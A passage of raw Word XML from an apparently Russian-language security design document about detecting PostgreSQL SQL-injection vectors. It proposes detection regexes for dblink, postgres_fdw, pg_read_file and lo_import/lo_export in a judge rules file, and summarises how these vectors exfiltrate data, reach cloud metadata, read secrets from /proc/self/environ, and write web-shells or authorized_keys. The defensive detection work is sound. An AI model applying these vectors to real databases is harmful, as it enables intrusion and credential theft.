          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB548A4"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lo_import</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_create</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_put</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — четвёртая ветка единого detector-а для всей серии 3.6.x. Базовый риск 9, для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поднять до 10 (write-вектор, RCE-потенциал). В саммари 3.6 — сводный regex со всеми четырьмя ветками: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink_connect|dblink_exec|dblink|CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw|pg_read_file|pg_read_binary_file|pg_read_server_files|lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\b</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0BE68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168554F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Server-Side Functions for Large Objects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_put</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_unlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418DED3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Large Objects — Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — внутренности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject_metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928F163" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Predefined Roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1274C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — lo_import / lo_export для file write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D81A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Greenwolf: Authenticated arbitrary command execution on PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — классический разбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для web-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32A9FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0716D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC61FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В блоке B (out-of-band каналы) разобраны четыре PG-специфичных вектора, через которые SQL-инъекция превращается в эксфильтрацию, SSRF или RCE без участия HTTP-ответа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A478591" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1 dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — OOB через PUBLIC-доступную extension после установки. Три payload-карточки: DNS-простой (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t>), DNS-chunked hex (полная эксфильтрация через RFC 1035 labels), TCP с захватом startup-packet. Самый низкий порог входа из всех четырёх векторов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DBEC0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.2 postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SSRF (cloud metadata, internal port scan, NTLM capture на Windows) + параллельный DNS-канал. Атака упакована в анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-блок (избегает stacked-queries), требует цепочки трёх привилегий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE ON FDW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схеме → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FADF61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3 pg_read_file / pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — file-read с возвратом прямо через UNION (без OOB-канала). Три уровня доступности: уровень (1) PUBLIC + относительные пути (PG_VERSION для fingerprinting); уровень (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + абсолютные пути; уровень (3) superuser. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приоритетная цель для env-vars (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DATABASE_URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AWS_SECRET_ACCESS_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PGPASSWORD</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A583200" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 lo_import / lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — двухшаговый OID-based file-read + единственный write-вектор во всей категории 3.6. Три цели </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: web-shell, перезапись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust-auth, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Две разные predefined roles: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (read) vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (write — выдаётся ещё реже).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348318D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>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1"/>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="2319"/>
        <w:gridCol w:w="1687"/>
        <w:gridCol w:w="1818"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3122437E"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45BFC91"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7F51D11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Вектор</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168FF94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия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421818C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>R/W</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47394DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managed-доступность</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5D30EEB1"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83F984" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.6.1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07EE09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OOB (DNS + TCP)</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4381C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PUBLIC после </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION dblink</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D64CBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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4AD744" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ограничена egress security-group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0A0231C3"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41F5D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.6.2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80DE0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF + OOB (DNS)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D33AE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>USAGE ON FDW</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на схеме</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871014" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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807B2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ограничена; на RDS preinstalled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3AA44FC2"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3BB31A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3.6.3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5294D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File-read (UNION)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24858D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) любая роль для PG_VERSION; (2) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_read_server_files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24215A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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205D32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уровни (2)/(3) структурно недоступны</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6B73FE77"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94A469" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.6.4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742F4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File r/w (OID)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479109" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_read_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R) + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_write_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (W)</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93EE0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
